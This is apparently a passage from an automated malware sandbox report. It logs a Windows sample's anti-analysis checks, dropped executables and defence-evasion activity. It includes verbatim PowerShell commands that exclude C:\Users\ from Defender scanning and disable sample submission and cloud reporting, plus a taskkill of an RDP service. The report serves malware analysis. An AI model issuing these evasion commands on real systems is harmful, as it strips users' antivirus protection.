Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_13-11199
Source: C:\Users\user\Desktop\file.exe TID: 5748Thread sleep time: -23760000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5748Thread sleep time: -119997s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep count: 5505 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep count: 4302 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep time: -6456360425798339s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep count: 8228 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep count: 1286 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7408Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep count: 7002 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7508Thread sleep count: 2690 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8184Thread sleep count: 165 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8184Thread sleep time: -82500s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7188Thread sleep count: 178 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7188Thread sleep time: -89000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 7180Thread sleep count: 71 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8004Thread sleep count: 1401 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8004Thread sleep time: -4203000s >= -30000s
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8004Thread sleep count: 6871 > 30
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe TID: 8004Thread sleep time: -20613000s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
Source: C:\Users\user\Desktop\file.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeLast function: Thread delayed
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeFile Volume queried: C:\Windows\System32 FullSizeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CE3DB3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,13_2_00007FF7E3CE3DB3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FF7AABD47A3 FindNextFileA,_mbscpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FF7AABD47A3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB2270A083 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB2270A083
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22731883 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB22731883
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB22765BF3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB22765BF3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23AB57B3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23AB57B3
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23AD5203 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23AD5203
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FFB23B02FE3 FindNextFileA,strcpy,FindFirstFileA,GetLastError,GetLastError,FindClose,29_2_00007FFB23B02FE3
Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 119997Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: file.exeBinary or memory string: =QemuLH
Source: svchost.exe, 00000002.00000002.2526307322.000001FBE9464000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $@SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.
Source: svchost.exe, 00000002.00000002.2526005018.000001FBE944D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000002.00000002.2525800047.000001FBE9427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: svchost.exe, 00000028.00000002.2527366735.00000298640B3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000028.00000002.2526801542.000002986402B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.NoneVMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9dVMware20,1
Source: svchost.exe, 00000002.00000002.2526506814.000001FBE9502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware, Inc.VMW201.00V.20829224.B64.221121184211/21/2022
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
Source: svchost.exe, 00000005.00000003.2003948520.000001E70113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6000c298128b8c02a71a2474aeb5f3dc|Virtual disk |VMware
Source: file.exe, 00000008.00000002.2526951120.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.2525477850.0000024C9102B000.00000004.00000020.00020000.00000000.sdmp, yhar2he6rpt6n0h1w6rh.exe, 00000012.00000002.1546477161.00000239DD11D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001D.00000002.2202769902.0000027B4335C000.00000004.00000020.00020000.00000000.sdmp, main.exe, 0000001D.00000003.1489637593.0000027B4337C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: main.exe, 00000029.00000002.2528204660.000001FE46857000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQ
Source: svchost.exe, 00000005.00000003.2003948520.000001E70113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc
Source: svchost.exe, 00000005.00000003.2003948520.000001E70113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C6000c298128b8c02a71a2474aeb5f3dc|Virtual disk |VMware
Source: svchost.exe, 00000002.00000002.2525800047.000001FBE9427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual disk 2.0 6000c298128b8c02a71a2474aeb5f3dc$
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000SCSI\CdRomNECVMWarVMware_SATA_CD001.00SCSI\CdRomNECVMWarVMware_SATA_CD00SCSI\CdRomNECVMWarSCSI\NECVMWarVMware_SATA_CD001NECVMWarVMware_SATA_CD001GenCdRom
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware20,1
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM00000001VMW-4096MBRAM slot #0RAM slot #0
Source: svchost.exe, 00000002.00000002.2525442740.000001FBE9402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIES1371
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual RAM
Source: svchost.exe, 00000028.00000002.2526962025.0000029864088000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXT15E6VMWare
Source: svchost.exe, 00000002.00000002.2526005018.000001FBE944D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: svchost.exe, 00000005.00000003.2003948520.000001E70113E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: svchost.exe, 00000005.00000003.2013778502.000001E701150000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000SCSI\DiskVMware__Virtual_disk____2.0_SCSI\DiskVMware__Virtual_disk____SCSI\DiskVMware__SCSI\VMware__Virtual_disk____2VMware__Virtual_disk____2GenDisk
Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeProcess queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CEFF1F GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,13_2_00007FF7E3CEFF1F
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CE8CFC FreeLibrary,strlen,GetProcessHeap,HeapAlloc,BuildTrusteeWithSidW,BuildSecurityDescriptorW,GetProcessHeap,HeapFree,LocalFree,13_2_00007FF7E3CE8CFC
Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CE1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,13_2_00007FF7E3CE1131
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CFB6A0 SetUnhandledExceptionFilter,13_2_00007FF7E3CFB6A0
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CF05D9 SetUnhandledExceptionFilter,13_2_00007FF7E3CF05D9
Source: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exeCode function: 29_2_00007FF7AABD1131 Sleep,Sleep,_amsg_exit,_initterm,_initterm,SetUnhandledExceptionFilter,malloc,strlen,malloc,_cexit,29_2_00007FF7AABD1131

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\lr75sq5smrngkif9fpn.exeCode function: 13_2_00007FF7E3CE292E strlen,strcat,strlen,strlen,strlen,strcat,strlen,strlen,strlen,strcat,LogonUserA,GetLastError,CreateProcessAsUserA,GetLastError,CloseHandle,CreateProcessA,GetLastError,13_2_00007FF7E3CE292E
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 440 -p 7988 -ip 7988
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7988 -s 1128
Source: C:\Users\user\AppData\Local\Temp\yhar2he6rpt6n0h1w6rh.exeProcess created: C:\Windows\System32\taskkill.exe taskkill.exe /F /FI "SERVICES eq RDP-Controller"Jump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C: VolumeInformationJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
